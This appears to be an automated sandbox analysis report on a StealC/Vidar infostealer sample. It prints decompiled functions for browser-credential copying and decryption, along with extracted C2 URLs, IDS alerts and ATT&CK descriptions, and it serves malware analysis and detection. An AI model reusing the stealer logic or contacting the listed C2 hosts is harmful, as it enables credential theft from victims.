memset.MSVCRT ref: 0040DA81

Strings

image/jpeg, xrefs: 0040DA4B

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: mallocmemset
String ID: image/jpeg
API String ID: 2882185209-3785015651
Opcode ID: 1feda1477c6b4b05d825673ee0d55253da40e09b69c46bcd29b209c8d0f32510
Instruction ID: 05db291b2e9cae32aa641309c156ea6583efeea92b5d1712678024af34f2bec5
Opcode Fuzzy Hash: 1feda1477c6b4b05d825673ee0d55253da40e09b69c46bcd29b209c8d0f32510
Instruction Fuzzy Hash: 101179B2E04128FBCB21DFA49D44A8EBB79FB45760F204272F811B62D0C2705B489F98

Uniqueness

Uniqueness Score: -1.00%

Function 00407371 Relevance: 6.2, APIs: 4, Instructions: 180
filestringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00407371(void* __ecx, void* __eflags, CHAR* _a4, char _a16, char _a28, char _a40) {
				char _v8;
				char _v12;
				char _v24;
				CHAR* _v36;
				char _v48;
				char _v60;
				char _v72;
				char _v84;
				char _v96;
				char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t71;
				void* _t102;
				void* _t120;
				void* _t124;
				void* _t125;
				void* _t139;
				void* _t154;
				void* _t155;
				void* _t160;
				void* _t162;
				void* _t190;
				void* _t191;

				_t195 = __eflags;
				_t154 = __ecx;
				E0040EA50( &_v36, __eflags, 0x40fbe1);
				E0040EAEF(E0040EB6B( &_v36, _t154,  &_v60, __eflags,  *0x6133e4), _t154,  &_v36);
				E004016EF(_v60);
				_t71 = E0040D800(0x40fbe1,  &_v48, _t195, 0x1a);
				_pop(_t155);
				E0040EAEF(E0040EB29( &_v36, _t155, _t71,  &_v60, _t195), _t155,  &_v36);
				E004016EF(_v60);
				E004016EF(_v48);
				CopyFileA(_a4, _v36, 1);
				E0040EA50( &_v48, _t195, 0x40fbe1);
				E0040EAEF(E0040EB6B(E0040EB29(E0040EB6B(E0040EB29(E0040EB6B(E0040EB6B( &_v48, _t155,  &_v108, _t195,  *0x613328), _t155,  &_v96, _t195, 0x40fbe4), _t155,  &_a28,  &_v84, _t195), _t155,  &_v72, _t195, "_"), _t155,  &_a16,  &_v24, _t195), _t155,  &_v60, _t195,  *0x613248), _t155,  &_v48);
				E004016EF(_v60);
				E004016EF(_v24);
				E004016EF(_v72);
				E004016EF(_v84);
				E004016EF(_v96);
				E004016EF(_v108);
				_t102 =  *0x6135c0(_a4,  &_v12);
				if(_t102 == 0) {
					_t120 =  *0x61357c(_v12,  *0x6131bc, 0xffffffff,  &_v8, _t102);
					_t191 = _t190 + 0x14;
					_t197 = _t120;
					if(_t120 == 0) {
						E0040EA50( &_v24, _t197, 0x40fbe1);
						while(1) {
							_t124 =  *0x613598(_v8);
							_pop(_t160);
							if(_t124 != 0x64) {
								break;
							}
							_t125 =  *0x6135b4(_v8, 0);
							_pop(_t162);
							E0040EA50( &_v60, __eflags, _t125);
							E0040EAEF(E0040EB29( &_v24, _t162,  &_v60,  &_v108, __eflags), _t162,  &_v24);
							E004016EF(_v108);
							E0040EAEF(E0040EB6B( &_v24, _t162,  &_v96, __eflags, "\n"), _t162,  &_v24);
							E004016EF(_v96);
							E004016EF(_v60);
						}
						_t139 =  *0x61367c(_v24);
						_t199 = _t139 - 5;
						if(_t139 > 5) {
							_push( *0x61367c(_v24));
							_push(_v24);
							E0040EA82( &_v48, _t160, _t191 - 0xc, _t199);
							E00401581( &_a40, _t191 - 0xffffffffffffffbc);
							_push( &_v108);
							E00403721(_t160, _t199);
							E004016EF(_v108);
						}
						E004016EF(_v24);
						E004016EF(0);
					}
					 *0x61359c(_v8);
					 *0x6135c4(_v12);
				}
				DeleteFileA(_v36);
				E004016EF(_v36);
				E004016EF(_v48);
				E004016EF(0);
				E004016EF(0);
				E004016EF(_a4);
				E004016EF(_a16);
				E004016EF(_a28);
				return E00401562( &_a40);
			}

0x00407371
0x00407371
0x00407383
0x0040739c
0x004073a4
0x004073ae
0x004073b5
0x004073c4
0x004073cc
0x004073d4
0x004073e1
0x004073eb
0x00407442
0x0040744a
0x00407452
0x0040745a
0x00407462
0x0040746a
0x00407472
0x0040747e
0x00407488
0x0040749e
0x004074a4
0x004074a7
0x004074a9
0x004074b3
0x00407515
0x00407518
0x0040751e
0x00407522
0x00000000
0x00000000
0x004074bf
0x004074c6
0x004074cb
0x004074e0
0x004074e8
0x00407500
0x00407508
0x00407510
0x00407510
0x00407527
0x0040752d
0x00407530
0x0040753b
0x0040753c
0x00407547
0x00407554
0x0040755c
0x0040755d
0x00407568
0x00407568
0x00407570
0x00407577
0x00407577
0x0040757f
0x00407588
0x0040758f
0x00407593
0x0040759c
0x004075a4
0x004075ab
0x004075b2
0x004075ba
0x004075c2
0x004075ca
0x004075db

APIs

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

Part of subcall function 0040EB6B: lstrlen.KERNEL32(?,?,?,0040D07A,00412124,00000000,00412124,00000000,0040FBE1), ref: 0040EB7F
Part of subcall function 0040EB6B: lstrcpy.KERNEL32(00000000,?), ref: 0040EBA7
Part of subcall function 0040EB6B: lstrcat.KERNEL32(?,00000000), ref: 0040EBB2

Part of subcall function 0040EAEF: lstrcpy.KERNEL32(00000000,?), ref: 0040EB1F

Part of subcall function 0040D800: GetSystemTime.KERNEL32(?,0040FBE1,00000000,?,?,?,?,?,?,?,004031B4,00000014), ref: 0040D825

Part of subcall function 0040EB29: lstrcpy.KERNEL32(00000000,?), ref: 0040EB57
Part of subcall function 0040EB29: lstrcat.KERNEL32(?,00000000), ref: 0040EB61

CopyFileA.KERNEL32(?,?,00000001), ref: 004073E1
lstrlen.KERNEL32(?), ref: 00407527
lstrlen.KERNEL32(?), ref: 00407535
DeleteFileA.KERNEL32(?,?), ref: 00407593

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: abd819ff34c2b6f21f0a51986c49aee40f154576312c8895598b47eed59df4be
Instruction ID: e1aa0e60bbed50c5254b9d9982d757b29c7a1b521a3cc4fb065a3a8d0291212c
Opcode Fuzzy Hash: abd819ff34c2b6f21f0a51986c49aee40f154576312c8895598b47eed59df4be
Instruction Fuzzy Hash: 5661E932D00119ABCF00FBA6DC868CDB7B6AF04309B554976F501B71B1DA39BE15CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00404DEB Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 89
memoryCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E00404DEB(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				char _v20;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void _v84;
				void* __esi;
				intOrPtr _t39;
				void* _t44;
				int _t57;
				void* _t58;
				signed int _t60;
				intOrPtr _t61;
				long _t62;

				_t60 = __eax;
				if(__eax < 3) {
					L6:
					_push(0x40fbe1);
					goto L7;
				} else {
					__imp__memcmp(_a8, "v10", 3);
					if(__eax != 0 || ((0 | _a16 != 0x00000000) & (__eax & 0xffffff00 | _a12 != 0x00000000)) == 0) {
						goto L6;
					} else {
						_t57 = 0x40;
						memset( &_v84, 0, _t57);
						_t39 = _a8 + 3;
						_v76 = _t39;
						_t14 = _t60 - 0x13; // 0x6135ac
						_t62 = _t60 + 0xffffffe1;
						_v84 = _t57;
						_v80 = 1;
						_v72 = 0xc;
						_v60 = _t39 + _t14;
						_v56 = 0x10;
						_t58 = LocalAlloc(_t57, _t62);
						if(_t58 == 0) {
							goto L6;
						} else {
							_t56 = _v72 + _v76;
							_v8 = 0;
							_t44 =  *0x613794(_a16, _v72 + _v76, _t62,  &_v84, 0, 0, _t58, _t62,  &_v8, 0);
							_push(0x40fbe1);
							_t73 = _t44;
							if(_t44 < 0) {
								L7:
								_t61 = _a4;
								E0040EA50(_t61, __eflags);
							} else {
								E0040EA50( &_v20, _t73);
								E0040EAAB(_t56,  &_v20, _t58);
								 *((char*)(_v20 + _v8)) = 0;
								_t61 = _a4;
								E0040EA82( &_v20, _t56, _t61, _t73);
								E004016EF(_v20);
							}
						}
					}
				}
				return _t61;
			}

0x00404df3
0x00404df9
0x00404ed1
0x00404ed1
0x00000000
0x00404dff
0x00404e09
0x00404e14
0x00000000
0x00404e32
0x00404e34
0x00404e3b
0x00404e44
0x00404e47
0x00404e4a
0x00404e51
0x00404e56
0x00404e59
0x00404e60
0x00404e67
0x00404e6a
0x00404e77
0x00404e7b
0x00000000
0x00404e7d
0x00404e80
0x00404e95
0x00404e98
0x00404e9e
0x00404ea3
0x00404ea5
0x00404ed6
0x00404ed6
0x00404ed9
0x00404ea7
0x00404eaa
0x00404eb0
0x00404ebb
0x00404ec0
0x00404ec3
0x00404eca
0x00404eca
0x00404ea5
0x00404e7b
0x00404e14
0x00404ee4

APIs

memcmp.MSVCRT ref: 00404E09
memset.MSVCRT ref: 00404E3B
LocalAlloc.KERNEL32(00000040,-000000E1), ref: 00404E71

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

Part of subcall function 0040EAAB: lstrlen.KERNEL32(?,?,0040C841,0040FBE1,0040FBE1,00000000,00000000,?,?,0040D115), ref: 0040EAB1
Part of subcall function 0040EAAB: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EAE3

Part of subcall function 0040EA82: lstrcpy.KERNEL32(00000000,?), ref: 0040EAA1

Strings

v10, xrefs: 00404E01

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
String ID: v10
API String ID: 1400469952-1337588462
Opcode ID: 85afece09f1256ed6218116d8dcc9db47fc34c59e59ce7fd0fab73938da2ad3a
Instruction ID: af1329cb31fa8121be268ebe69f938c42bd63a270814b68137a6c32aa31e7289
Opcode Fuzzy Hash: 85afece09f1256ed6218116d8dcc9db47fc34c59e59ce7fd0fab73938da2ad3a
Instruction Fuzzy Hash: 5C216FB2A00118ABDB10DF99DD85AEFBBB8BF44314F14043AF901B7291D774AD158BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404626 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106
libraryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00404626(void* __ebx) {
				signed int _v8;
				signed int _v12;
				struct HINSTANCE__* _v16;
				int _v20;
				void* _v24;
				intOrPtr _t44;
				intOrPtr _t46;
				signed int _t47;
				void* _t48;
				signed int _t49;
				intOrPtr _t51;
				signed short _t53;
				CHAR* _t54;
				signed int _t55;
				signed int _t56;
				signed int _t58;
				signed int _t59;
				signed int _t62;
				void* _t65;
				signed int _t70;
				signed int _t78;
				signed int _t83;
				void* _t85;

				_t65 = __ebx;
				_t44 =  *((intOrPtr*)(__ebx + 0xc0));
				_v12 = _v12 & 0x00000000;
				if(_t44 == 0 ||  *((intOrPtr*)(__ebx + 0xc4)) == 0) {
					L23:
					return 0;
				} else {
					_t83 =  *((intOrPtr*)(__ebx + 0x144)) + _t44;
					while(1) {
						_t46 =  *((intOrPtr*)(_t83 + 0xc));
						_v8 = _t83;
						if(_t46 == 0) {
							goto L23;
						}
						_t47 = LoadLibraryA( *((intOrPtr*)(_t65 + 0x144)) + _t46);
						_v16 = _t47;
						__eflags = _t47;
						if(_t47 == 0) {
							L25:
							_push(6);
							L26:
							_pop(_t48);
							return _t48;
						}
						_t49 =  *(_t65 + 0x154);
						__eflags =  *(_t65 + 0x150) - _t49;
						if( *(_t65 + 0x150) < _t49) {
							L12:
							 *((intOrPtr*)(_v12 +  *(_t65 + 0x150) * 4)) = _v16;
							 *(_t65 + 0x150) =  *(_t65 + 0x150) + 1;
							_t51 =  *((intOrPtr*)(_t65 + 0x144));
							_t78 =  *((intOrPtr*)(_t83 + 0x10)) + _t51;
							__eflags =  *(_t83 + 4);
							_v8 = _t78;
							if( *(_t83 + 4) == 0) {
								while(1) {
									L20:
									_t41 =  &_v8; // 0x6139e0
									_t53 =  *( *_t41);
									__eflags = _t53;
									if(__eflags == 0) {
										break;
									}
									if(__eflags >= 0) {
										_t54 = _t53 +  *((intOrPtr*)(_t65 + 0x144)) + 2;
									} else {
										_t54 = _t53 & 0x0000ffff;
									}
									_t55 = GetProcAddress(_v16, _t54);
									 *_t78 = _t55;
									__eflags = _t55;
									if(_t55 == 0) {
										goto L25;
									} else {
										_v8 = _v8 + 4;
										_t78 = _t78 + 4;
										__eflags = _t78;
										continue;
									}
								}
								_t83 = _t83 + 0x14;
								__eflags = _t83;
								continue;
							}
							_t70 =  *_t83;
							__eflags = _t70;
							if(_t70 == 0) {
								_push(8);
								goto L26;
							}
							_v8 = _t70 + _t51;
							goto L20;
						}
						__eflags = _t49;
						if(_t49 == 0) {
							_t56 = 0x10;
						} else {
							_t56 = _t49 + _t49;
						}
						 *(_t65 + 0x154) = _t56;
						_t58 = E0040D78D(_t56 << 2);
						_v12 = _t58;
						__eflags = _t58;
						if(_t58 == 0) {
							_push(3);
							goto L26;
						} else {
							_t59 =  *(_t65 + 0x150);
							__eflags = _t59;
							if(_t59 != 0) {
								_t62 = _t59 << 2;
								__eflags = _t62;
								_v20 = _t62;
								_v24 =  *(_t65 + 0x14c);
								memcpy(_v12, _v24, _v20);
								_t85 = _t85 + 0xc;
								_t19 =  &_v8; // 0x6139e0
								_t83 =  *_t19;
							}
							E0040D770( *(_t65 + 0x14c));
							 *(_t65 + 0x14c) = _v12;
							goto L12;
						}
					}
					goto L23;
				}
			}

0x00404626
0x0040462c
0x00404632
0x0040463a
0x0040475c
0x00000000
0x0040464d
0x00404653
0x0040474e
0x0040474e
0x00404751
0x00404756
0x00000000
0x00000000
0x00404663
0x00404669
0x0040466c
0x0040466e
0x00404762
0x00404762
0x00404764
0x00404764
0x00000000
0x00404764
0x00404674
0x0040467a
0x00404680
0x004046e4
0x004046f0
0x004046f3
0x004046f9
0x00404702
0x00404704
0x00404708
0x0040470b
0x00404742
0x00404742
0x00404742
0x00404745
0x00404747
0x00404749
0x00000000
0x00000000
0x0040471a
0x00404727
0x0040471c
0x0040471c
0x0040471c
0x0040472f
0x00404735
0x00404737
0x00404739
0x00000000
0x0040473b
0x0040473b
0x0040473f
0x0040473f
0x00000000
0x0040473f
0x00404739
0x0040474b
0x0040474b
0x00000000
0x0040474b
0x0040470d
0x0040470f
0x00404711
0x0040476b
0x00000000
0x0040476b
0x00404715
0x00000000
0x00404715
0x00404682
0x00404684
0x0040468c
0x00404686
0x00404686
0x00404686
0x0040468d
0x00404697
0x0040469d
0x004046a0
0x004046a2
0x00404767
0x00000000
0x004046a8
0x004046a8
0x004046ae
0x004046b0
0x004046b2
0x004046b2
0x004046b5
0x004046be
0x004046ca
0x004046ca
0x004046cc
0x004046cc
0x004046cc
0x004046d5
0x004046de
0x00000000
0x004046de
0x004046a2
0x00000000
0x0040474e

APIs

LoadLibraryA.KERNEL32(?,00000000,?,?,00404883,?), ref: 00404663

Strings

9a, xrefs: 00404742, 004046CC, 0040472B

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: 9a
API String ID: 1029625771-3489679592
Opcode ID: 9fe0c0a00cb6a73357de733d21a39136eb6f4c69b948ad560dc9a6bd8fbabfcf
Instruction ID: 0214af7154407be8c9eb651f6ca8c2f76c89931bcb4113b643e75099a9175202
Opcode Fuzzy Hash: 9fe0c0a00cb6a73357de733d21a39136eb6f4c69b948ad560dc9a6bd8fbabfcf
Instruction Fuzzy Hash: 25416BB5A00205DFDF10DF64C980BAA77B5AB85355F1844BADE09EF381E738E900CB68

Uniqueness

Uniqueness Score: -1.00%

Source: 0.2.B7VbZC8QLf.exe.8a0e67.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.B7VbZC8QLf.exe.8c0000.0.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "http://jerrysmith.online/410b5129171f0ea.php"}
Source: 0.2.B7VbZC8QLf.exe.400000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://jerrysmith.online/410b5129171f10ea.php"}

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Code function: 0_2_0040D983 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_0040D983
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Code function: 0_2_00404CAA LocalAlloc,StrStrA,memcmp,CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00404CAA
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Code function: 0_2_0040B967 RegEnumValueA,lstrcat,lstrcat,StrStrA,GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,lstrcpy,GetProcessHeap,HeapFree,lstrcat,lstrcpy,wsprintfA,lstrcat,lstrcat,RegEnumValueA,	0_2_0040B967
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Code function: 0_2_00406790 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,	0_2_00406790
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Code function: 0_2_00404BBC CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00404BBC

Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49690 -> 85.31.45.22:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.5:49691 -> 85.31.45.22:80
Source: Traffic	Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.5:49692 -> 85.31.45.22:80

Source: Malware configuration extractor	URLs: http://jerrysmith.online/410b5129171f10ea.php
Source: Malware configuration extractor	URLs: http://jerrysmith.online/410b5129171f0ea.php

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
